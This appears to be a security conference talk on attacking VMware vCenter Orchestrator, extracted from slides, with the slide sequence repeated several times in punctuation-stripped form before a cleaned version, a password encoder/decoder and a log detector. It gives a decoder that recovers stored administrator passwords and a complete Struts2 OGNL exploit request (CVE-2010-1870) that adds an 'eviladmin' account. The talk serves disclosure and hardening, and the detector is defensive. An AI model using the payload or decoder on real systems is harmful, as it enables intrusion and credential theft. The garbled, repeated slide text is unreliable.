passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
bull Which contains md5 password without salt bull Could easy bruteforce using rainbow tables
GPU
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
We get in
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Plain text passwords
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
bull CVE-2010-1870 Struts2XWork remote command execution discovered by Meder Kydyraliev
bull Fixed in 42
CVE-2010-1870
bull OGNL ndash expression language for java bull Struts2 treat each HTTP parameter name as
OGNL statement httptargetloginactionpage[lsquologinrsquo]=user actiongetPage()setLanguage(ldquouserrdquo)
CVE-2010-1870
bull OGNL support bull Method calling foo() bull Static method
calling javalangSystemexit(1) bull Constructor calling new MyClass() bull Refer to variables foo = new MyClass() bull Context variables application session
context
CVE-2010-1870
bull Struts2 does not properly escape ldquordquo bull Could be bypass with unicode ldquou0023rdquo
bull 2 variables need to be set for RCE bull _memberAccess[allowStaticMethodAccess] bull context[xworkMethodAccessordenyMethodE
xecution]
CVE-2010-1870
bull Example exploit bull _memberAccess[allowStaticMethodAccess] =
true bull foo = new java langBoolean(false) bull context[xworkMethodAccessordenyMethodE
xecution] = foo bull rt = javalangRuntimegetRuntime() bull rtexec(lsquocalcexersquo)
CVE-2010-1870
bull Example exploit bull httptarget8282loginaction
(u0023_memberAccess[allowStaticMethodAccess])(meh)=trueamp(aaa)((u0023context[xworkMethodAccessordenyMethodExecution]u003du0023foo) (u0023foou003dnew javalangBoolean(false)))amp (asdf)((u0023rtexec(ldquonet user add eviladmin passWD123rdquo)) (u0023rtu003djavalangRuntimegetRuntime()))=1
Hardering
bull Update to latest version 42 update 4 or 5 bull Filter administration service services bull VMware vSphere Security Hardering Guide
Conclusions
bull Fixed bugs not always fixed in proper way bull One simple bug and we can own all
infrastructure bull Password must be stored in hash with salt or
encrypted
Thank you
aminozhenkodsecru al3xmin
- How to hack VMware vCenter server in 60 secondsAlexey Sintsov Alexander Minozhenko
- whoami
- ERPScan
- Target
- Target
- VMware vCenter Server
- CVE-2009-1523
- Directory traversalagain
- Directory traversal
- VASTO
- Slide Number 11
- Attack
- Attack
- Attack
- Vmware vCenter Orchestrator
- Slide Number 16
- We get in
- Plain text passwords
- Vmware vCenter Orchestrator
- VCxml
- Password Encoding
- Algorithm password Encoding
- Password Decoder
- VMSA-2011-0005
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- CVE-2010-1870
- Hardering
- Conclusions
- Thank you
-
Vmware vCenter Orchestrator
bull vCO stored password at files bull CProgram
FilesVMwareInfrastructureOrchestratorapp- serverservervmoconfpluginsVCxml
bull CProgram FilesVMwareInfrastructureOrchestratorapp-serverservervmoconfvmoproperties
VCxml
ltxml version=10 encoding=UTF-8 standalone=yesgt ltvirtual-infrastructure-hostsgt ltvirtual-infrastructure-host ltenabledgttrueltenabledgt lturlgthttpsnew-virtual-center-host443sdklturlgt ltadministrator-usernamegtvmwareltadministrator-
usernamegt ltadministrator-
passwordgt010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef ltadministrator-passwordgt
ltpatterngtultpatterngt ltvirtual-infrastructure-hostgt ltvirtual-infrastructure-hostsgt
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079
vcenter bull Red bytes look like length bull Green bytes in ASCII range bull Black bytes random
Algorithm password Encoding
for (int i = 0 i lt nbDigits i++) int value = 0 if (i lt pwdlength()) value = pwdcharAt(i) Take i-th password symbol else value = Mathabs(rndnextInt() 100) Take random byte String toAdd = IntegertoHexString(value + i) i-th password symbol +
position of symbol resultappend(toAdd)
Password Decoder
len = (pass[02])to_i enc_pass = pass[3-1]scan(2) dec_pass = (0len)collect do |i| byte = enc_pass[i]to_i(16) byte -= i bytechr end
VMSA-2011-0005
bull VMware vCenter Orchestrator use Struts2 version 211 discovered by Digital Defense Inc
VC.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<virtual-infrastructure-hosts>
  <virtual-infrastructure-host>
    <enabled>true</enabled>
    <url>https://new-virtual-center-host:443/sdk</url>
    <administrator-username>vmware</administrator-username>
    <administrator-password>010506275767b74786b383a4a60be767864740329d5fcf324ec7fc98b1e0aaeef</administrator-password>
    <pattern>u</pattern>
  </virtual-infrastructure-host>
</virtual-infrastructure-hosts>
Password Encoding
006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b = vmware
00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079 = vcenter
• Red bytes (the leading 006 / 007) look like the length
• Green bytes (the following pairs) are in the ASCII range
• Black bytes (the rest) are random
Algorithm password Encoding
for (int i = 0; i < nbDigits; i++) {
    int value = 0;
    if (i < pwd.length()) {
        value = pwd.charAt(i);                   // Take i-th password symbol
    } else {
        value = Math.abs(rnd.nextInt() % 100);   // Take random byte
    }
    String toAdd = Integer.toHexString(value + i); // i-th password symbol + position of symbol
    result.append(toAdd);
}
Password Decoder
len = pass[0..2].to_i              # first three digits: password length
enc_pass = pass[3..-1].scan(/../)  # remaining hex string as byte pairs
dec_pass = (0...len).collect do |i|
  byte = enc_pass[i].to_i(16)
  byte -= i                        # undo the position offset
  byte.chr
end
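The encoder and decoder from the two slides above, as one round-trip implementation added here (not the slides' or VMware's code). It assumes the 3-digit decimal length prefix and the 32 hex pairs seen in the slide samples, since the slide's Java loop shows only the body; the sample values are copied from the slides.

```ruby
# Added example: vCenter Orchestrator VC.xml password obfuscation, encode + decode.
# Layout (inferred from the slide samples, an assumption for the prefix):
#   "%03d" % password.length, then nb_digits hex pairs where
#   pair[i] = hex(char_i + i) for i < length, and hex(random(0..99) + i) after.
# There is no key: the value only hides the password from a casual glance.

NB_DIGITS = 32 # 64 hex chars after the prefix, as in the slide samples

# Encode a password with the position-dependent offset the slide describes.
def vco_encode(pwd, nb_digits = NB_DIGITS, rnd = Random.new)
  result = format('%03d', pwd.length)
  nb_digits.times do |i|
    value = i < pwd.length ? pwd[i].ord : rnd.rand(100)
    # The original uses Integer.toHexString, which emits a single digit for
    # values < 16 and would misalign the pairs; %02x keeps them aligned.
    result << format('%02x', value + i)
  end
  result
end

# Decode: read the length prefix, then subtract each pair's position.
def vco_decode(enc)
  len = enc[0..2].to_i
  pairs = enc[3..-1].scan(/../)
  raise ArgumentError, 'truncated value' if pairs.length < len
  (0...len).map { |i| (pairs[i].to_i(16) - i).chr }.join
end

# Sample values copied from the "Password Encoding" slide.
SAMPLES = {
  '006766e7964766a151e213a242665123568256c4031702d4c78454e5b575f60654b' => 'vmware',
  '00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e24726079' => 'vcenter'
}.freeze

if __FILE__ == $PROGRAM_NAME
  SAMPLES.each_key { |enc| puts "#{enc} -> #{vco_decode(enc)}" }
  puts vco_decode(vco_encode('S3cret!'))
end
```

Decoding needs nothing but the string itself, which is why the conclusions slide asks for salted hashes or real encryption instead.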
VMSA-2011-0005
• VMware vCenter Orchestrator uses Struts2 version 2.1.1 (discovered by Digital Defense Inc.)
• CVE-2010-1870: Struts2/XWork remote command execution (discovered by Meder Kydyraliev)
• Fixed in 4.2
CVE-2010-1870
• OGNL: expression language for Java
• Struts2 treats each HTTP parameter name as an OGNL statement:
  http://target/login.action?page['login']=user  ->  action.getPage().setLanguage("user")
CVE-2010-1870
• OGNL supports:
  • Method calling: foo()
  • Static method calling: @java.lang.System@exit(1)
  • Constructor calling: new MyClass()
  • Referring to variables: #foo = new MyClass()
  • Context variables: #application, #session, #context
CVE-2010-1870
• Struts2 does not properly escape "#"
• Could be bypassed with the unicode escape "\u0023"
• 2 variables need to be set for RCE:
  • #_memberAccess['allowStaticMethodAccess']
  • #context['xwork.MethodAccessor.denyMethodExecution']
CVE-2010-1870
• Example exploit:
  #_memberAccess['allowStaticMethodAccess'] = true
  #foo = new java.lang.Boolean(false)
  #context['xwork.MethodAccessor.denyMethodExecution'] = #foo
  #rt = @java.lang.Runtime@getRuntime()
  #rt.exec('calc.exe')
CVE-2010-1870
• Example exploit as a single request (\u0023 is '#', \u003d is '='):
  http://target:8282/login.action?(\u0023_memberAccess[allowStaticMethodAccess])(meh)=true&(aaa)((\u0023context[xwork.MethodAccessor.denyMethodExecution]\u003d\u0023foo)(\u0023foo\u003dnew java.lang.Boolean(false)))&(asdf)((\u0023rt.exec("net user add eviladmin passWD123"))(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
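A log-review check for the pattern the CVE-2010-1870 slides describe (OGNL placed in HTTP parameter *names*, with `\u0023` standing in for the escaped `#`), added here as an example that is not part of the original talk. It assumes Apache/Tomcat combined-format access log lines; the sample lines are constructed.

```ruby
# Added example: flag requests whose parameter *names* look like OGNL statements,
# the CVE-2010-1870 shape described on the slides. Constructed sample log lines;
# combined-format access log is an assumption.
require 'cgi'

# Indicators that a parameter name is being used as an OGNL statement.
OGNL_NAME_PATTERNS = [
  /\\u0023/i,                                    # unicode-escaped '#' (the escape bypass)
  /#/,                                           # literal '#' variable/context prefix
  /_memberAccess/i,                              # allowStaticMethodAccess toggle
  /xwork\.MethodAccessor\.denyMethodExecution/i,
  /@[\w.]+@\w+/,                                 # @java.lang.Runtime@getRuntime static call
  /\bnew\s+java\./i                              # constructor calls
].freeze

# Pull the request target out of a combined-format log line; nil if absent.
def parse_request(line)
  m = line.match(/"(?:GET|POST|PUT|HEAD)\s+(\S+)\s+HTTP\/[\d.]+"/)
  return nil unless m
  path, query = m[1].split('?', 2)
  [path, query || '']
end

# Return the URL-decoded parameter names in a query string that match an indicator.
def suspicious_param_names(query)
  query.split('&').filter_map do |pair|
    name = CGI.unescape(pair.split('=', 2).first.to_s)
    name if OGNL_NAME_PATTERNS.any? { |re| name.match?(re) }
  end
end

# Scan lines; returns [[line_no, path, [suspicious names]], ...] for hits only.
def scan_access_log(lines)
  lines.each_with_index.filter_map do |line, idx|
    path, query = parse_request(line)
    next if path.nil?
    bad = suspicious_param_names(query)
    [idx + 1, path, bad] unless bad.empty?
  end
end

# Constructed sample: one benign request, one setting the _memberAccess flag via
# an escaped '#', one making a static method call in a parameter name.
SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jun/2011:10:00:01 +0400] "GET /login.action?page=login HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jun/2011:10:00:02 +0400] "GET /login.action?(%5Cu0023_memberAccess%5B%27allowStaticMethodAccess%27%5D)(x)=true HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Jun/2011:10:00:03 +0400] "POST /login.action?(%5Cu0023rt%5Cu003d@java.lang.Runtime@getRuntime())(y)=1 HTTP/1.1" 500 80'
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_access_log(SAMPLE_LOG).each do |no, path, names|
    puts "line #{no}: #{path} suspicious parameter names: #{names.join(', ')}"
  end
end
```

Parameter names are decoded before matching because the escape in the talk only has to survive URL decoding to reach the OGNL evaluator.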
Hardening
• Update to the latest version: 4.2 update 4 or 5
• Filter access to the administration services
• Follow the VMware vSphere Security Hardening Guide
Conclusions
• Fixed bugs are not always fixed in a proper way
• One simple bug and we can own the whole infrastructure
• Passwords must be stored as salted hashes or encrypted
Thank you
aminozhenko@dsec.ru, al3xmin